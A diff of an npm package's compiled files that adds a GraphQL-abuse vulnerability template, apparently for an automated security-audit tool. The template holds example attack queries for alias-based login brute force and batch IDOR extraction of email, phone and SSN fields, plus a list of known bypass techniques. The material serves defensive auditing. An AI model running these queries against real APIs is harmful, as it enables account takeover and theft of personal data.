+        }
+      }
+    }
+  }
+}
+\`\`\`
+
+Alias brute force (rate limit bypass):
+\`\`\`graphql
+mutation {
+  a: login(email: "admin@example.com", password: "password1") { token }
+  b: login(email: "admin@example.com", password: "password2") { token }
+  c: login(email: "admin@example.com", password: "password3") { token }
+  # ... 997 more aliases
+}
+\`\`\`
+
+Batch IDOR:
+\`\`\`graphql
+{
+  a: user(id: "1") { email phone ssn }
+  b: user(id: "2") { email phone ssn }
+  c: user(id: "3") { email phone ssn }
+}
+\`\`\`
+
+SEVERITY ASSESSMENT:
+- Critical: Admin mutation accessible to regular users (privilege escalation)
+- Critical: Alias brute force on authentication with no rate limit
+- High: Sensitive PII fields accessible without proper authorization
+- High: Introspection enabled exposing internal/admin schema in production
+- Medium: No depth/complexity limits enabling DoS
+- Medium: Batch queries bypassing per-request rate limits
+- Low: Debug/playground enabled in production without sensitive data exposure
+
+RELEVANT SPECIFICATIONS:
+- GraphQL Specification Section 4 (Introspection)
+- OWASP GraphQL Cheat Sheet
+- CWE-200, CWE-770, CWE-307 (Improper Restriction of Excessive Authentication Attempts)
+
+Cite exact file paths, line numbers, the missing security control, and the specific exploit query.`,
+    knownBypasses: [
+        'Alias-based brute force: 1000+ login attempts in a single GraphQL request',
+        'Introspection via __type queries when __schema is blocked',
+        'Nested fragment cycles causing exponential expansion (DoS)',
+        'Batch query array bypassing per-request rate limits',
+        'Subscription flooding: thousands of concurrent subscriptions exhausting resources',
+        'Field suggestion leak: error messages reveal hidden field names',
+        'Persisted query bypass: sending arbitrary queries alongside persisted query hashes',
+    ],
+    specReferences: [
+        'GraphQL Specification Section 4 (Introspection)',
+        'OWASP GraphQL Cheat Sheet',
+        'CWE-200 (Exposure of Sensitive Information)',
+        'CWE-770 (Allocation of Resources Without Limits)',
+        'CWE-307 (Improper Restriction of Excessive Authentication Attempts)',
+    ],
+    severityRange: ['medium', 'critical'],
+};
+//# sourceMappingURL=graphql-abuse.js.map

package/dist/hunt/templates/graphql-abuse.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"graphql-abuse.js","sourceRoot":"","sources":["../../../src/hunt/templates/graphql-abuse.ts"],"names":[],"mappings":"AAEA,MAAM,CAAC,MAAM,YAAY,GAA0B;IACjD,EAAE,EAAE,eAAe;IACnB,IAAI,EAAE,eAAe;IACrB,GAAG,EAAE,SAAS;IACd,YAAY,EAAE,CAAC,SAAS,EAAE,OAAO,EAAE,UAAU,EAAE,UAAU,EAAE,QAAQ,EAAE,KAAK,EAAE,QAAQ,EAAE,aAAa,EAAE,OAAO,EAAE,QAAQ,CAAC;IACvH,gBAAgB,EAAE,EAAE;IACpB,YAAY,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2GA0D2F;IAEzG,cAAc,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;mGA4EiF;IAEjG,aAAa,EAAE;QACb,2EAA2E;QAC3E,2DAA2D;QAC3D,4DAA4D;QAC5D,qDAAqD;QACrD,mFAAmF;QACnF,iEAAiE;QACjE,oFAAoF;KACrF;IACD,cAAc,EAAE;QACd,iDAAiD;QACjD,2BAA2B;QAC3B,6CAA6C;QAC7C,kDAAkD;QAClD,qEAAqE;KACtE;IACD,aAAa,EAAE,CAAC,QAAQ,EAAE,UAAU,CAAC;CACtC,CAAC"}

package/dist/hunt/templates/hardcoded-credentials.d.ts

@@ -0,0 +1,2 @@
+import type { VulnerabilityTemplate } from '../../types.js';
+export declare const hardcodedCredentials: VulnerabilityTemplate;